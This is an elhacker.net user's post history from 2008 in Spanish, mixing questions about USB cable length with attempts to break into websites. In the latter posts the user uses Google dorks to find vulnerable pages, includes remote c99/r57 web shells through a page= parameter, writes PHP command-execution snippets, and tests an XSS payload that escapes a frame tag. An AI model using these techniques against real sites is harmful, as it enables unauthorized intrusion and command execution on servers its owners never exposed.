elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 2 3 [4]
31  Seguridad Informática / Materiales y equipos / Re: cable demasiado largo? en: 16 Julio 2008, 18:03 pm
hey yo no sé, pero creo que la resistencia del cable también depende de su longitud deben ser 50 y 75 ohmios por metro, por ende, un cable de 3 metros de "50" va a tener la misma resistencia que un cable de "75" de 2 metros. No creo que valga la pena comprar cable nuevo si puedes cortar un poco el cable y moverte 5 metros hacia donde haya un poco mas de señal.
32  Seguridad Informática / Materiales y equipos / Re: Problema con cable USB en: 16 Julio 2008, 17:53 pm
A mi me pasó con un usb y 1,80m de prolongación me decia que no reconocia al dispositivo, aunque si conectaba una webcam o lo que sea si funcionaba, por ahi encontré que la perdida de carga en el cable es tan importante que lo le llega la suficiente alimentación!! yo no sé, suena a locura, pero corté el cable y lo soldé para tener unos 50cm y funciono bien  :rolleyes: . Algo que leí es que se puede usar es un cable usb activo que funciona como una especie de potencia o amplificador y termina con este inconveniente, o bien unas prolongaciones usb inalambricas que llegan a 40 metros pero cuestan algunos chelines mas. Y por último creo que el estandar usb dice que tendria que funcionar con cables usb comunes hasta 3 metros, pero esto no se donde lo lei  :P
33  Seguridad Informática / Materiales y equipos / Re: puedo poner mi zydas con 10 metros de cable usb?? en: 23 Junio 2008, 18:59 pm
encontre esto por ahi:

Citar
el largo de un cable usb segun la norma puede ser de hasta 6 metros y si es de buena calidad hasta 8 metros (yo he usado hasta 10 metros con webcams) pero el problema en otros aparatos de mas alto consumo como discos duros y aparatos wifi es que LA CORRIENTE QUE SUMINISTRA EL PUERTO USB no es la suficiente para poder recorrer todo este largo del cable y solo llega una pequeña cantidad la que no es suficiente para que funcione el aparato. independiende de la caida de voltaje.

los usb activos solo trabajan sobre la alimentacion del dispositivo usb como dice en este texto? o tambien amplifican la señal?

Alguien sabe como fabricar un usb activo casero? es que no encuentro mucho sobre eso y ando un poco escaso de fondos  :P
34  Seguridad Informática / Materiales y equipos / Re: Cuestion sobre tarjeta usb en: 23 Junio 2008, 03:48 am
yo tengo un usb wifi en windows
35  Seguridad Informática / Materiales y equipos / Re: puedo poner mi zydas con 10 metros de cable usb?? en: 23 Junio 2008, 03:39 am
una duda... què es un cable usb activo, yo conecte un usb para wifi con un cable usb de dos metros y no me lo reconoce, me dice algo como que el dispositivo no esta funcionando correctamente y si lo conecto directamente a la maquina funciona perfectamente. Cuales podrian ser los posibles problemas y soluciones? Gracias por leer.
36  Seguridad Informática / Nivel Web / Re: c99.txt y r57.txt en: 8 Junio 2008, 06:28 am
al final creo que debe ser eso de tener el safe mode on en el servidor, porque en algunos lados donde podia redireccionar a google sin usar frames o iframes y las shell se ejecutaban por la mitad no podia ejecutar algo tan sencillo como esto:

<?php
  system($cmd)
?>

lo escribi de memoria, no se si era exactamente asi, pero tenia que poner algo como index.php?page=http://www.misitio.com/shell.txt?cmd=pwd? y no pasaba nada con y sin el ? al final. asi que creo que por eso no consigo hacer funcionar las shells.. ya me parece un poco dificil encontrar donde ejecutarlas
 :P :P

encontre esto:

La función system esta deshabilitada por el modo seguro de php, motivos de seguridad

y otra cosa es que en paginas hechas en iespana para pasar los parametros por la url teneia que usar $HTTP_GET_VARS["variable"] o sino no me tomaba su contenido.

creo que en este tiempito aprendí bastante, gracias a todos por dar una mano.  :-*  :xD :xD :xD que gay  :xD :xD
37  Seguridad Informática / Nivel Web / Re: c99.txt y r57.txt en: 4 Junio 2008, 21:03 pm
bueno, segui con mi busqueda filetype:php inurl:page inurl:htm y despues miraba el codigo fuente buscando cosas como las que dijo Azielito y al final creo que encontre una web vulnerable, pero comparado con la shell que se ve aca

http://www.youtube.com/watch?v=Zrp-HeeU4ME

la que ejecute es parecida (http://www.deyvill.org/c99.txt) con algunas cajas de texto pero con un gran desparramo de texto alrededor que parece codigo fuente... ¿que es eso? codigo que no se pudo ejecutar en el servidor? quise meter un simple ls y me salto una pagina de error y despues intente con un dir y paso lo mismo... alguien me puede explicar que es lo que vi? puede que estor errores al meter los comandos sean por el mismo motivo que hay codigo desparramado por toda la interfaz?

suponiendo que tengo php?page=http://www.deyvill.org/c99.txt

como tendria que hacer para ejecutar un comando desde la barra de direcciones, o sea, sin usar la shell? supongo que sera posible no?

--------------------- Minutos despues ------------------------

encontre esto la sección de textos de elhacker.net

Citar
Nota: solo van a correr estos comandos los servidores tengan el safe mode
en off.

Entonces codeamos algo así:

<?php
$cmd=$_GET['cmd'];
show_source($cmd);
?>

Y lo subimos a nuestro Server, este seria explotado de esta manera:

http://victima.com/pagvuln.php?page=http//[tusitio]/file-a-incluir

Estas funciones permiten correr comandos en el sistema. Ya sabiendo
usarlas podemos ponerle una extensión .gif y subirlas a nuestro webserver
para incluirlas en la victima desde ahí. Se las renombra a .gif, ya que si las
dejáramos en php se ejecutarían en nuestro server.

Ejecutores de comandos
Los ejecutores de comandos o "shells en php" son líneas de código que permiten
ejecutar comandos más fácil, se usan así:

http://victima.com/pagvuln.php?page=http//[tusitio]/shell.php?cmd=ls

este ultimo renglon me genera una confusion, y es que dice shell.php?cmd=ls , no tendira que decir shell.gif?cmd=ls o cualquier otra extension que no sea php?

yo subi un archivo php y uno gif a un servidor para ver esto y cuando uso el php me dice que el safe mode esta activado y me da unos path del servidor donde estan los archivos que yo subi (entonces creo que se ejecuta en mi servidor) y cuando uso el gif no me muestra nada, supongo que el servidor vulnerable no es tan vulnerable y tiene tambien el safe mode acrivado ¿puede ser este el motivo por el que la shell c99 no se ve bien?
38  Seguridad Informática / Nivel Web / Re: c99.txt y r57.txt en: 3 Junio 2008, 21:23 pm
en google estoy usando cosas como estas:

filetype:php inurl:url inurl:htm

pero no encuentro ninguno vulnerable para ver como es, siempre pasa lo mismo, creo que es lo de <iframe src=...

creo que en el codigo fuente tendria que haber un get? pude ser? hay alguna forma de buscar en google algo en el codigo fuente?
39  Seguridad Informática / Nivel Web / Re: c99.txt y r57.txt en: 31 Mayo 2008, 16:50 pm
El script funciono bien, ahora las diferencias entre

><script>alert();</script>

y

<script>alert()</script> son porque hay que cerrar la llave abierta con el <frame src??? de modo que quedaria algo asi:

<frame src=><script>alert();</script><noframes>
no entiendo bien lo del ";" pero creo que voy bien, entonces si la pagina fuese verdaderamente vulnerable no tendria que mostrarme a google via frame src y entonces quizas el script para XSS no tendria que funcionar? estoy en lo correcto?
Páginas: 1 2 3 [4]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines